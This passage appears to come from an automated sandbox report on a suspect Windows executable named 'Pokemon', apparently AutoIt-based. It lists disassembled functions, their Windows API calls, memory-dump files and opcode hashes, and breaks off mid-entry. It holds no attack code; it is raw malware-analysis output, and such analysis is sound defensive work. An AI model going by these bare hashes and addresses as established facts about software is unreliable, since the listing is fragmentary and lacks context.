                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 977211eca57c6ab4dff64e72de6b55cb7ff544ef3eb31535dea34b7268f3ad8d
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: B3619D75A00228AFDB10DFA4DC81EEE77B8EF49704F100159FA04E72A1D7B4A965DB50
                                                                                                                                                                                                                                                                                      Function 000FBAF6 Relevance: 15.1, APIs: 10, Instructions: 88threadCOMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 000FBB18
                                                                                                                                                                                                                                                                                      • GetForegroundWindow.USER32(00000000,?,?,?,?,?,000FABA8,?,00000001), ref: 000FBB2C
                                                                                                                                                                                                                                                                                      • GetWindowThreadProcessId.USER32(00000000), ref: 000FBB33
                                                                                                                                                                                                                                                                                      • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,000FABA8,?,00000001), ref: 000FBB42
                                                                                                                                                                                                                                                                                      • GetWindowThreadProcessId.USER32(?,00000000), ref: 000FBB54
                                                                                                                                                                                                                                                                                      • AttachThreadInput.USER32(?,00000000,00000001,?,?,?,?,?,000FABA8,?,00000001), ref: 000FBB6D
                                                                                                                                                                                                                                                                                      • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,000FABA8,?,00000001), ref: 000FBB7F
                                                                                                                                                                                                                                                                                      • AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,000FABA8,?,00000001), ref: 000FBBC4
                                                                                                                                                                                                                                                                                      • AttachThreadInput.USER32(?,?,00000000,?,?,?,?,?,000FABA8,?,00000001), ref: 000FBBD9
                                                                                                                                                                                                                                                                                      • AttachThreadInput.USER32(00000000,?,00000000,?,?,?,?,?,000FABA8,?,00000001), ref: 000FBBE4
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.3071594084.0000000000091000.00000020.00000001.01000000.00000008.sdmp, Offset: 00090000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071561737.0000000000090000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.000000000012D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.0000000000153000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071795560.000000000015D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071853296.0000000000165000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_90000_Pokemon.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: Thread$AttachInput$Window$Process$CurrentForeground
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 2156557900-0
                                                                                                                                                                                                                                                                                      • Opcode ID: b0323d67e485ef89e859354e15264afd95617b60a7149a616c958151589ae07c
                                                                                                                                                                                                                                                                                      • Instruction ID: acb0c8cc78a0f191c950790eb94d4c12e74ffc6b0620680fc9de56d6c97c16bf
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: b0323d67e485ef89e859354e15264afd95617b60a7149a616c958151589ae07c
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 48318D72904218BFDB209B24EC88FBA77E9AB49312F108015FB05D79A4D7F8D8819F60
                                                                                                                                                                                                                                                                                      Function 000C2FF3 Relevance: 15.1, APIs: 10, Instructions: 54COMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • _free.LIBCMT ref: 000C3007
                                                                                                                                                                                                                                                                                        • Part of subcall function 000C2D38: RtlFreeHeap.NTDLL(00000000,00000000,?,000CDB51,00161DC4,00000000,00161DC4,00000000,?,000CDB78,00161DC4,00000007,00161DC4,?,000CDF75,00161DC4), ref: 000C2D4E
                                                                                                                                                                                                                                                                                        • Part of subcall function 000C2D38: GetLastError.KERNEL32(00161DC4,?,000CDB51,00161DC4,00000000,00161DC4,00000000,?,000CDB78,00161DC4,00000007,00161DC4,?,000CDF75,00161DC4,00161DC4), ref: 000C2D60
                                                                                                                                                                                                                                                                                      • _free.LIBCMT ref: 000C3013
                                                                                                                                                                                                                                                                                      • _free.LIBCMT ref: 000C301E
                                                                                                                                                                                                                                                                                      • _free.LIBCMT ref: 000C3029
                                                                                                                                                                                                                                                                                      • _free.LIBCMT ref: 000C3034
                                                                                                                                                                                                                                                                                      • _free.LIBCMT ref: 000C303F
                                                                                                                                                                                                                                                                                      • _free.LIBCMT ref: 000C304A
                                                                                                                                                                                                                                                                                      • _free.LIBCMT ref: 000C3055
                                                                                                                                                                                                                                                                                      • _free.LIBCMT ref: 000C3060
                                                                                                                                                                                                                                                                                      • _free.LIBCMT ref: 000C306E
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.3071594084.0000000000091000.00000020.00000001.01000000.00000008.sdmp, Offset: 00090000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071561737.0000000000090000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.000000000012D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.0000000000153000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071795560.000000000015D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071853296.0000000000165000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_90000_Pokemon.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 776569668-0
                                                                                                                                                                                                                                                                                      • Opcode ID: 39725dcc497071f57ede5e884a90af14dc4680a5d7883cfbce5a023ebce730b2
                                                                                                                                                                                                                                                                                      • Instruction ID: 62fe9fd141396b2470a446db549332015851b6a5435b6f5a0f126848253d9e18
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 39725dcc497071f57ede5e884a90af14dc4680a5d7883cfbce5a023ebce730b2
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: A811C876100108BFCB01EF94C942EDD3BB5EF15350B9144A9FA099FA33DA31EE919B91
                                                                                                                                                                                                                                                                                      Function 00092AB0 Relevance: 14.3, APIs: 7, Strings: 1, Instructions: 332comCOMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 00092AF9
                                                                                                                                                                                                                                                                                      • OleUninitialize.OLE32(?,00000000), ref: 00092B98
                                                                                                                                                                                                                                                                                      • UnregisterHotKey.USER32(?), ref: 00092D7D
                                                                                                                                                                                                                                                                                      • DestroyWindow.USER32(?), ref: 000D3A1B
                                                                                                                                                                                                                                                                                      • FreeLibrary.KERNEL32(?), ref: 000D3A80
                                                                                                                                                                                                                                                                                      • VirtualFree.KERNEL32(?,00000000,00008000), ref: 000D3AAD
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.3071594084.0000000000091000.00000020.00000001.01000000.00000008.sdmp, Offset: 00090000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071561737.0000000000090000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.000000000012D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.0000000000153000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071795560.000000000015D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071853296.0000000000165000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_90000_Pokemon.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
                                                                                                                                                                                                                                                                                      • String ID: close all
                                                                                                                                                                                                                                                                                      • API String ID: 469580280-3243417748
                                                                                                                                                                                                                                                                                      • Opcode ID: 4f5901a59955872a865d3fab04ab5fc97ee4ee82bf634c942bab9e1f47ba351b
                                                                                                                                                                                                                                                                                      • Instruction ID: a72f3669a781e65893d14dcbaa936cb3b70d662648970796e62047caac9018e4
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 4f5901a59955872a865d3fab04ab5fc97ee4ee82bf634c942bab9e1f47ba351b
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: F3D18E71701212EFCF68EF14D995AA9F7A0BF04710F1142AEE54A6B352CB30AD62DF51
                                                                                                                                                                                                                                                                                      Function 00108835 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 230COMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 001089F2
                                                                                                                                                                                                                                                                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 00108A06
                                                                                                                                                                                                                                                                                      • GetFileAttributesW.KERNEL32(?), ref: 00108A30
                                                                                                                                                                                                                                                                                      • SetFileAttributesW.KERNEL32(?,00000000), ref: 00108A4A
                                                                                                                                                                                                                                                                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 00108A5C
                                                                                                                                                                                                                                                                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 00108AA5
                                                                                                                                                                                                                                                                                      • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 00108AF5
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.3071594084.0000000000091000.00000020.00000001.01000000.00000008.sdmp, Offset: 00090000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071561737.0000000000090000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.000000000012D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.0000000000153000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071795560.000000000015D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071853296.0000000000165000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_90000_Pokemon.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: CurrentDirectory$AttributesFile
                                                                                                                                                                                                                                                                                      • String ID: *.*
                                                                                                                                                                                                                                                                                      • API String ID: 769691225-438819550
                                                                                                                                                                                                                                                                                      • Opcode ID: 0d4ced694a51448388e3fd040a7569573c9ae3db47e9cbee2d88b79ac2331cec
                                                                                                                                                                                                                                                                                      • Instruction ID: 779fd9ee19ddb3eb70abaa2211e253a0ee81fb7cf1760f3998ab4f432328313f
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 0d4ced694a51448388e3fd040a7569573c9ae3db47e9cbee2d88b79ac2331cec
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 2B81AF729083449BCB24EF14C844ABAB3E8BF94314F54882EF8C5D7291DFB4DA459B92
                                                                                                                                                                                                                                                                                      Function 00097447 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 184windowCOMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • SetWindowLongW.USER32(?,000000EB), ref: 000974D7
                                                                                                                                                                                                                                                                                        • Part of subcall function 00097567: GetClientRect.USER32(?,?), ref: 0009758D
                                                                                                                                                                                                                                                                                        • Part of subcall function 00097567: GetWindowRect.USER32(?,?), ref: 000975CE
                                                                                                                                                                                                                                                                                        • Part of subcall function 00097567: ScreenToClient.USER32(?,?), ref: 000975F6
                                                                                                                                                                                                                                                                                      • GetDC.USER32 ref: 000D6083
                                                                                                                                                                                                                                                                                      • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 000D6096
                                                                                                                                                                                                                                                                                      • SelectObject.GDI32(00000000,00000000), ref: 000D60A4
                                                                                                                                                                                                                                                                                      • SelectObject.GDI32(00000000,00000000), ref: 000D60B9
                                                                                                                                                                                                                                                                                      • ReleaseDC.USER32(?,00000000), ref: 000D60C1
                                                                                                                                                                                                                                                                                      • MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 000D6152
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.3071594084.0000000000091000.00000020.00000001.01000000.00000008.sdmp, Offset: 00090000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071561737.0000000000090000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.000000000012D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.0000000000153000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071795560.000000000015D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071853296.0000000000165000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_90000_Pokemon.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
                                                                                                                                                                                                                                                                                      • String ID: U
                                                                                                                                                                                                                                                                                      • API String ID: 4009187628-3372436214
                                                                                                                                                                                                                                                                                      • Opcode ID: 6b9142f72ebe067b91223d17beabcafbb0de46ecf1730a619f5b36152bb12fe4
                                                                                                                                                                                                                                                                                      • Instruction ID: 2e5a62676bcebe75f8489133c920486898d3cfadfedd93b6912c0efc5bca9024
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 6b9142f72ebe067b91223d17beabcafbb0de46ecf1730a619f5b36152bb12fe4
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: CC71BE35500305EFCF758F64CC84AAA7BB5FF49320F18426AE9595A2A7C7329891EB60
                                                                                                                                                                                                                                                                                      Function 0012955E Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 149windowCOMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                        • Part of subcall function 0009249F: GetWindowLongW.USER32(00000000,000000EB), ref: 000924B0
                                                                                                                                                                                                                                                                                        • Part of subcall function 000919CD: GetCursorPos.USER32(?), ref: 000919E1
                                                                                                                                                                                                                                                                                        • Part of subcall function 000919CD: ScreenToClient.USER32(00000000,?), ref: 000919FE
                                                                                                                                                                                                                                                                                        • Part of subcall function 000919CD: GetAsyncKeyState.USER32(00000001), ref: 00091A23
                                                                                                                                                                                                                                                                                        • Part of subcall function 000919CD: GetAsyncKeyState.USER32(00000002), ref: 00091A3D
                                                                                                                                                                                                                                                                                      • ImageList_DragLeave.COMCTL32(00000000,00000000,00000001,?), ref: 001295C7
                                                                                                                                                                                                                                                                                      • ImageList_EndDrag.COMCTL32 ref: 001295CD
                                                                                                                                                                                                                                                                                      • ReleaseCapture.USER32 ref: 001295D3
                                                                                                                                                                                                                                                                                      • SetWindowTextW.USER32(?,00000000), ref: 0012966E
                                                                                                                                                                                                                                                                                      • SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 00129681
                                                                                                                                                                                                                                                                                      • DefDlgProcW.USER32(?,00000202,?,?,00000000,00000001,?), ref: 0012975B
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.3071594084.0000000000091000.00000020.00000001.01000000.00000008.sdmp, Offset: 00090000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071561737.0000000000090000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.000000000012D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.0000000000153000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071795560.000000000015D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071853296.0000000000165000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_90000_Pokemon.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: AsyncDragImageList_StateWindow$CaptureClientCursorLeaveLongMessageProcReleaseScreenSendText
                                                                                                                                                                                                                                                                                      • String ID: @GUI_DRAGFILE$@GUI_DROPID
                                                                                                                                                                                                                                                                                      • API String ID: 1924731296-2107944366
                                                                                                                                                                                                                                                                                      • Opcode ID: 70662d0e1e1be6b4e143aca3963676b5a27c50ee54bf64c3d59b15d02ff1d59c
                                                                                                                                                                                                                                                                                      • Instruction ID: f4857d924e6de7ae7c09074e61a05fb25188a89ca28e167272c8ca8cc22b40d8
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 70662d0e1e1be6b4e143aca3963676b5a27c50ee54bf64c3d59b15d02ff1d59c
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: CB51AE70204310AFDB14EF24EC56FAA77E4FB88714F400A2DF995A72E2DB709958DB52
                                                                                                                                                                                                                                                                                      Function 0010CC98 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 94networkCOMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 0010CCB7
                                                                                                                                                                                                                                                                                      • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0010CCDF
                                                                                                                                                                                                                                                                                      • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 0010CD0F
                                                                                                                                                                                                                                                                                      • GetLastError.KERNEL32 ref: 0010CD67
                                                                                                                                                                                                                                                                                      • SetEvent.KERNEL32(?), ref: 0010CD7B
                                                                                                                                                                                                                                                                                      • InternetCloseHandle.WININET(00000000), ref: 0010CD86
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.3071594084.0000000000091000.00000020.00000001.01000000.00000008.sdmp, Offset: 00090000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071561737.0000000000090000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.000000000012D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.0000000000153000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071795560.000000000015D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071853296.0000000000165000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_90000_Pokemon.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: HttpInternet$CloseErrorEventHandleInfoLastOpenQueryRequestSend
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 3113390036-3916222277
                                                                                                                                                                                                                                                                                      • Opcode ID: e28bfd385ebc8083d2a8411e93b9892e87b4352393359ae3d802fb04bc8663cd
                                                                                                                                                                                                                                                                                      • Instruction ID: 487581e8ce0cd7e2f03e345367322d23fb69bcb464cd384f69beaa8aeff43f19
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: e28bfd385ebc8083d2a8411e93b9892e87b4352393359ae3d802fb04bc8663cd
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: AE317171500204AFD7319FA5DC84AAB7BFCEB49744B10462EF48593290DB74DD499BE1
                                                                                                                                                                                                                                                                                      Function 000FA215 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 74windowCOMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,00000000,?,000D55AE,?,?,Bad directive syntax error,0012DCD0,00000000,00000010,?,?), ref: 000FA236
                                                                                                                                                                                                                                                                                      • LoadStringW.USER32(00000000,?,000D55AE,?), ref: 000FA23D
                                                                                                                                                                                                                                                                                        • Part of subcall function 0009B329: _wcslen.LIBCMT ref: 0009B333
                                                                                                                                                                                                                                                                                      • MessageBoxW.USER32(00000000,00000001,00000001,00011010), ref: 000FA301
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.3071594084.0000000000091000.00000020.00000001.01000000.00000008.sdmp, Offset: 00090000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071561737.0000000000090000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.000000000012D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.0000000000153000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071795560.000000000015D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071853296.0000000000165000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_90000_Pokemon.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: HandleLoadMessageModuleString_wcslen
                                                                                                                                                                                                                                                                                      • String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
                                                                                                                                                                                                                                                                                      • API String ID: 858772685-4153970271
                                                                                                                                                                                                                                                                                      • Opcode ID: 1dd959b720d29830057a3008ddb99ffd435344046e069025806f7255bf736fd8
                                                                                                                                                                                                                                                                                      • Instruction ID: 3c4093bcf09481be38eddfbb58fac04916b6e1ed248f2c72a8ee3ef50016df01
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 1dd959b720d29830057a3008ddb99ffd435344046e069025806f7255bf736fd8
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 2B217E7190021EEFCF11EBA0DC0AEFE7B79BF18700F004459B615654A3EB729668EB11
                                                                                                                                                                                                                                                                                      Function 000F29EC Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 71windowCOMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • GetParent.USER32 ref: 000F29F8
                                                                                                                                                                                                                                                                                      • GetClassNameW.USER32(00000000,?,00000100), ref: 000F2A0D
                                                                                                                                                                                                                                                                                      • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 000F2A9A
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.3071594084.0000000000091000.00000020.00000001.01000000.00000008.sdmp, Offset: 00090000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071561737.0000000000090000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.000000000012D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.0000000000153000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071795560.000000000015D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071853296.0000000000165000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_90000_Pokemon.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: ClassMessageNameParentSend
                                                                                                                                                                                                                                                                                      • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                                                                                                                                                                                                                                                                                      • API String ID: 1290815626-3381328864
                                                                                                                                                                                                                                                                                      • Opcode ID: 6c648b9b79f4e28d508bd6286229e6f50337f9bbfe16456eacd8281ac507368d
                                                                                                                                                                                                                                                                                      • Instruction ID: 769cc7375203fdce0a1dc50b62e267979afcd95bee1b8771b21ad8fd51112b00
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 6c648b9b79f4e28d508bd6286229e6f50337f9bbfe16456eacd8281ac507368d
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: C311067634430BFBFA346620EC07DFA37DC8F15725B200012FA04E58D2FB656955A556
                                                                                                                                                                                                                                                                                      Function 00097567 Relevance: 13.8, APIs: 9, Instructions: 291COMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • GetClientRect.USER32(?,?), ref: 0009758D
                                                                                                                                                                                                                                                                                      • GetWindowRect.USER32(?,?), ref: 000975CE
                                                                                                                                                                                                                                                                                      • ScreenToClient.USER32(?,?), ref: 000975F6
                                                                                                                                                                                                                                                                                      • GetClientRect.USER32(?,?), ref: 0009773A
                                                                                                                                                                                                                                                                                      • GetWindowRect.USER32(?,?), ref: 0009775B
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.3071594084.0000000000091000.00000020.00000001.01000000.00000008.sdmp, Offset: 00090000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071561737.0000000000090000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.000000000012D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.0000000000153000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071795560.000000000015D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071853296.0000000000165000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_90000_Pokemon.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: Rect$Client$Window$Screen
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 1296646539-0
                                                                                                                                                                                                                                                                                      • Opcode ID: 0a014833cbfe927f166ca7fa453078713f6adf9d28c85d0a5cddd9170b89e53b
